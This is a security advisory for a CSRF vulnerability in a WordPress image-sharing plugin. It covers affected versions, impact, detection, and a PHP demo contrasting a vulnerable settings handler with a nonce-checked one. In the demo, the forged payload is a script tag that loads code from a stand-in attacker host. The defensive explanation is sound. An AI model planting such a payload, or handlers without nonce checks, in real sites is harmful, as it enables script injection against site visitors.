Platform: wordpress
Component: tw-image-hover-share
Fixed in: 1.0.9
CVE-2025-13360 is a Cross-Site Request Forgery (CSRF) vulnerability in the Quantic Social Image Hover plugin for WordPress (slug tw-image-hover-share). An attacker who holds no account on the site can get the plugin's settings changed by having a logged-in administrator's browser submit a forged request, and the changed settings can carry malicious web scripts that the plugin then serves to the site's visitors. Versions 1.0.0 through 1.0.8 are affected; the vendor reports the issue fixed in version 1.0.9.
A CSRF flaw of this kind means the settings-update handler does not verify that the request came from the plugin's own settings page, so when an administrator visits an attacker-controlled page or follows a crafted link, their browser submits the forged request with their WordPress session cookies attached and the change is accepted. The attacker needs no credentials, but does need a victim who is logged in with the right to change the plugin's settings. Once the settings are under attacker control, they can hold arbitrary JavaScript that the plugin outputs, redirect visitors to phishing sites, or otherwise alter the plugin's behaviour. The blast radius is therefore the whole site: every visitor to a page on which the plugin renders its output, not only the administrator whose session was abused.
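The pattern behind a settings CSRF, as an added example that is not the plugin's code: a handler that writes settings straight from the POST body next to a hardened version that demands a capability and a nonce before writing and sanitizes the value it stores. The function, option and field names (sih_share_label, sih_save_settings) are hypothetical, and the WordPress functions are stubbed at the top so the file runs under the php CLI outside WordPress; inside WordPress those stubs are skipped because the real functions exist.

```php
<?php
// Added example, not code from the Quantic Social Image Hover plugin.
// Option, field and action names below are invented for illustration.

// Minimal stand-ins for the WordPress functions used, so this runs offline
// with `php csrf_example.php`. Inside WordPress these functions already exist
// and this block is skipped.
if (!function_exists('update_option')) {
    $GLOBALS['wp_options'] = [];
    $GLOBALS['fake_caps']  = [];
    function update_option($name, $value) { $GLOBALS['wp_options'][$name] = $value; return true; }
    function get_option($name, $default = false) { return $GLOBALS['wp_options'][$name] ?? $default; }
    function current_user_can($cap) { return $GLOBALS['fake_caps'][$cap] ?? false; }
    function wp_create_nonce($action) { return 'nonce-for-' . $action; }        // toy nonce
    function wp_verify_nonce($nonce, $action) { return $nonce === 'nonce-for-' . $action ? 1 : false; }
    function sanitize_text_field($s) { return trim(strip_tags((string) $s)); }
    function wp_die($msg) { throw new RuntimeException($msg); }
}

// Vulnerable pattern: the setting is written from the POST body on any request
// that reaches the handler. A forged cross-site POST sent by a logged-in
// administrator's browser succeeds, because nothing ties the request to the
// plugin's own settings form.
function vulnerable_save_settings(array $post): void {
    if (isset($post['sih_share_label'])) {
        update_option('sih_share_label', $post['sih_share_label']); // raw value stored
    }
}

// Hardened pattern: require a capability the victim must hold, require a nonce
// bound to this action (a cross-site page cannot obtain one), and sanitize the
// value so markup such as a <script> tag is not persisted.
function hardened_save_settings(array $post): void {
    if (!current_user_can('manage_options')) {
        wp_die('insufficient privileges');
    }
    if (!isset($post['_wpnonce']) || !wp_verify_nonce($post['_wpnonce'], 'sih_save_settings')) {
        wp_die('nonce check failed');
    }
    if (isset($post['sih_share_label'])) {
        update_option('sih_share_label', sanitize_text_field($post['sih_share_label']));
    }
}

// Constructed scenario: the victim is an administrator, and the attacker's page
// submits a form without a nonce (it has no way to know one).
$GLOBALS['fake_caps'] = ['manage_options' => true];
$forged = ['sih_share_label' => '<script src="https://attacker.example/x.js"></script>'];

vulnerable_save_settings($forged);
echo "vulnerable handler stored: ", get_option('sih_share_label'), PHP_EOL;

update_option('sih_share_label', 'Share this image');
try {
    hardened_save_settings($forged);
} catch (RuntimeException $e) {
    echo "hardened handler rejected forged request: ", $e->getMessage(), PHP_EOL;
}
echo "hardened handler setting is still: ", get_option('sih_share_label'), PHP_EOL;

// A request from the plugin's own settings form carries the nonce, so it is
// accepted; the stored value is the sanitized text, with the tag stripped.
$legit = $forged + ['_wpnonce' => wp_create_nonce('sih_save_settings')];
hardened_save_settings($legit);
echo "hardened handler stored from legitimate form: '", get_option('sih_share_label'), "'", PHP_EOL;
```

In a real plugin the simplest way to get both checks is the Settings API: register the option with register_setting() (with a sanitize callback) and emit the form with settings_fields(), which outputs the nonce field that options.php verifies before saving. A handler that reads $_POST directly, as the vulnerable function above does, has to call check_admin_referer() or wp_verify_nonce() and current_user_can() itself.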
The vulnerability was publicly disclosed on 2025-12-05. No public proof-of-concept exploit is known. The CVSS base score is 4.3 (Medium); CVSS measures severity rather than likelihood of exploitation, and the EPSS figure on this page (0.02%) is the better gauge of that. The CVE is not listed in the CISA KEV catalog.
Any WordPress site running the plugin at version 1.0.8 or earlier is at risk. Exposure is higher where several users hold administrator rights, since each of their browsers can be tricked into submitting the forged request, and on multi-site or shared hosting estates where plugin updates are rolled out centrally and the plugin may lag behind 1.0.9 on some sites.
Detection (run on the WordPress host):
• Check the installed version with WP-CLI; any version from 1.0.0 up to and including 1.0.8 is affected:
  wp plugin get tw-image-hover-share --field=version
• Without WP-CLI, read the Version header from the plugin's main file:
  grep -rE '^\s*\*?\s*Version:' /var/www/html/wp-content/plugins/tw-image-hover-share/
An HTTP status from wp-admin/admin-ajax.php does not reveal the installed version and is not a reliable indicator; rely on the version check.
Disclosure date: 2025-12-05
Exploit status: no public proof of concept known
EPSS: 0.02% (percentile 3%)
CVSS: 4.3 (Medium)
The fix for CVE-2025-13360 is to update the Quantic Social Image Hover plugin to version 1.0.9 or later, the version the vendor reports as fixed. Until the update can be applied, deactivate the plugin; restricting the settings page to administrators does not help, because a CSRF request is issued by an administrator's own browser and carries their session. A web application firewall can add a layer of defence by rejecting POST requests to the plugin's settings endpoint whose Origin or Referer header is not the site itself, and SameSite attributes on the WordPress login cookies limit what a cross-site form can send, but neither replaces the update. Before and after updating, review the plugin's settings for unexpected content, in particular script tags or external URLs, and restore the intended configuration.
A fixed version (1.0.9) is available. If it cannot be applied, review the vulnerability details in depth and implement mitigations according to your organization's risk tolerance; uninstalling the affected plugin and finding a replacement may be preferable.
CVE-2025-13360 is a Cross-Site Request Forgery (CSRF) vulnerability in the Quantic Social Image Hover WordPress plugin: a forged request submitted by a logged-in administrator's browser can change the plugin's settings.
If you run Quantic Social Image Hover version 1.0.0 through 1.0.8, you are affected.
Update the plugin to version 1.0.9 or later. Until you can, deactivate the plugin; limiting who may open the settings page does not stop a forged request that rides on an administrator's own session.
As of the disclosure date there are no confirmed reports of active exploitation and no public proof of concept; EPSS puts the probability of exploitation at 0.02%.
Refer to the plugin developer's website or the WordPress plugin repository for the official advisory and patch release.